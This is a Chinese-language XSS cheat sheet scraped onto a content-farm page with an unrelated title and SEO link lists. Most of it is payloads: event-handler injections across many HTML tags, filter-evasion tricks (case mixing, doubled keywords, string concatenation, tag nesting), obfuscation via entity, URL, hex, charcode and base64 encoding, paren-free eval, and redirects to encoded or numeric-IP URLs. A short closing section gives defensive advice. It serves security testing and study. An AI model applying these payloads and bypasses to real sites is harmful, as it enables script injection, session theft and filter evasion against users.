当前位置: 首页 > wzjs >正文

保洁公司做网站有什么作用做网站建设优化的公司排名

保洁公司做网站有什么作用,做网站建设优化的公司排名,东莞哪家做网站好,wordpress中联系表跨站脚本攻击(XSS)是一种常见的 Web 漏洞,允许攻击者在受害者的浏览器中注入并执行恶意代码。以下是 XSS 攻击的完整总结,包括无过滤情况下的基础 Payload、存在过滤时的绕过技巧以及编码和混淆方法。 一、无过滤情况下的基础 Pay…

在这里插入图片描述

跨站脚本攻击(XSS)是一种常见的 Web 漏洞,允许攻击者在受害者的浏览器中注入并执行恶意代码。以下是 XSS 攻击的完整总结,包括无过滤情况下的基础 Payload、存在过滤时的绕过技巧以及编码和混淆方法。


一、无过滤情况下的基础 Payload

1. <script> 标签
  • 最直接的方式:
    <script>alert("xss");</script>
    
2. <img> 标签
  • 图片加载错误时触发:
    <img src="x" onerror=alert(1)>
    
  • 鼠标悬停或移出时触发:
    <img src=1 onmouseover="alert(1)">
    <img src=1 onmouseout="alert(1)">
    
3. <a> 标签
  • 使用伪协议 javascript: 执行代码:
    <a href="javascript:alert('xss')">test</a>
    
  • 鼠标悬停时触发:
    <a href="" onmouseover=prompt('xss')>aa</a>
    
4. <input> 标签
  • 利用焦点事件(onfocusonblur):
    <input onfocus="alert('xss');" autofocus>
    <input onblur=alert("xss") autofocus><input autofocus>
    
  • 键盘事件(onkeydownonkeypressonkeyup):
    <input type="text" onkeydown="alert(1)">
    
5. <form> 标签
  • 提交表单时触发:
    <form action=javascript:alert('xss') method="get">
    
6. <iframe> 标签
  • 加载外部资源或嵌入 JavaScript:
    <iframe src=javascript:alert('xss')></iframe>
    <iframe onload=alert("xss");></iframe>
    
7. 其他标签
  • <svg>
    <svg onload=alert(1)>
    
  • <body>
    <body onload="alert(1)">
    
  • <button>
    <button onclick="alert(1)">text</button>
    

二、存在过滤情况下的绕过技巧

1. 过滤空格
  • 使用 / 或其他符号代替空格:
    <img/src="x"/onerror=alert("xss");>
    
2. 关键字过滤
  • 大小写绕过
    <ImG sRc=x onerRor=alert("xss");>
    
  • 双写关键字绕过
    <imimgg srsrcc=x onerror=alert("xss");>
    
  • 字符拼接
    <img src="x" onerror="a=aler;b=t;c='(xss);';eval(a+b+c)">
    
3. 其他字符混淆
  • 注释干扰规则:
    <<script>alert("xss");//<</script>
    
  • 利用标签优先级:
    <title><img src=</title>><img src=x onerror="alert(`xss`);">
    

三、编码与混淆绕过

1. Unicode 编码
  • 将字符串转为 Unicode 编码:
    <img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">
    
2. URL 编码
  • 使用 unescape() 解码:
    <img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
    
3. ASCII 码
  • 使用 String.fromCharCode()
    <img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
    
4. Hex 编码
  • 使用十六进制表示字符串:
    <img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
    
5. Base64 编码
  • 嵌入 Base64 编码内容:
    <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
    

四、特殊场景绕过

1. 过滤括号
  • 使用 throw 绕过:
    <svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
    
2. 过滤引号
  • 使用反引号代替引号:
    <img src="x" onerror=alert(`xss`);>
    
3. 过滤 URL 地址
  • 使用 URL 编码:
    <img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>
    
  • 使用 IP 地址:
    <img src="x" onerror=document.location=`http://2130706433/`>
    
4. 过滤特定字符
  • 使用中文逗号代替英文逗号:
    <img src="x" onerror="document.location=`http://www。baidu。com`">
    

五、总结与建议

通过上述总结可以看出,XSS 攻击的核心在于找到输入点并利用各种方式绕过过滤机制。以下是一些建议:

  1. 开发者角度

    • 对所有用户输入进行严格的验证和清理。
    • 使用 Content Security Policy (CSP) 限制脚本来源。
    • 输出时对特殊字符进行 HTML 编码。
  2. 安全测试人员角度

    • 测试时关注各种可能的输入点,包括隐藏字段和 HTTP 头部。
    • 学会使用工具(如 Burp Suite)自动化检测漏洞。
    • 不断尝试新的绕过技巧,模拟真实攻击场景。

XSS 是一个复杂但有趣的领域,既需要理论知识的支持,也离不开实践中的不断探索。

希望本文能帮助你更好地理解 XSS 攻击及其防御方法!

http://www.dtcms.com/wzjs/803214.html

相关文章:

  • 网站如何不需要备案wordpress 微信 抓取
  • _网站建设网站私密浏览器免费看片在线看
  • 建筑网站的功能模块杭州网站优化流程
  • 国家对地理信息网站建设的重视网站开发主要用什么语言
  • 手机网站建设与制作专业室内设计 官网
  • 泉州网站建设费用山东企业网站建设公司
  • 营销推广有哪些公司佛山正规企业网站排名优化
  • 广州网站建设网页制作开发网站关键词优化网站推广
  • 做网站模板 优帮云电子商务网站建设规划心得
  • 盘锦建设信息网站张掖网站制作
  • 营业执照办好了就可以做网站了吗网站需求设计文档
  • 门户网站简介网站流量的转换率一般是多少
  • 淄博网站推广优化外贸网站建设公司价格
  • 如何解决网站兼容性问题网站空间服务器续费
  • 企业品牌网站建设注意事项安徽网站开发项目
  • 微网站如何做微信支付宝支付宝支付设计师导航网址
  • 建设网站后台小程序开发的发展前景
  • 创建个人网站有什么好处什么是做学院网站
  • 阳江网站建设推广东莞培训机构
  • 网站开发前端与后端源代码wordpress文章显示标签
  • 移动网站和桌面网站区别网站开发标准ppt
  • 增加网站关键词济宁市网站建设
  • 采购网站建设招标方案西安的互联网营销公司
  • vs 手机网站开发上海网站建设中心
  • 从信息化建设办公室网站个人注册公司的步骤
  • 专业网站建设组织263企业邮箱登录入口手机版
  • 建设工程挂网是在那个网站营销型网站推广方式的论文
  • 海北网站建设热狗网站关键词优化
  • 网站的ftp帐号海伦网站建设
  • 河北seo网站优化公司网站外网怎么做